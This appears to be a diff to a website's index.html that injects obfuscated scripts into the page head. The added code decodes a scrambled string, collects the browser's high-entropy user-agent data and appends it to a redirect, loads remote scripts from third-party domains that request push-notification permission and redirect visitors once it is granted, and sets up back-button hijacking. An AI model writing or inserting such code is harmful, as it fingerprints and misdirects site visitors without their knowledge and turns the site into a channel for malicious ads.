--- a/index.html
+++ b/index.html
@@ -2,6 +2,28 @@
 <!DOCTYPE html>
 <html lang="en">
   <head>
+    <script>
+    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
+    var s = document.createElement('script');
+    s.src='//coohauwhob.net/148/d7b46/mw.min.js?z=9490263'+'&sw=/sw-check-permissions-83b8e.js';
+    s.onload = function(result) {
+        switch (result) {
+            case 'onPermissionDefault':break;
+            case 'onPermissionAllowed':
+            Replace("//n91hg.com/4/9490266");break;
+            case 'onPermissionDenied':break;
+            case 'onAlreadySubscribed':break;
+            case 'onNotificationUnsupported':break;
+        }
+    };
+    document.head.appendChild(s);
+</script>
+<script>
+      var Back_Button_Zone = 9490266;
+      var Domain_TB = "g0st.com";
+</script>
+<script async src="https://desenteir.com/148/d7b46/reverse.min.js?sf=1"></script>
+
     <!-- Critical SEO Meta Tags -->
     <meta name="pushsdk" content="108ef7535f9a28ac95a7f756304e4dca">
     <meta charset="UTF-8" />
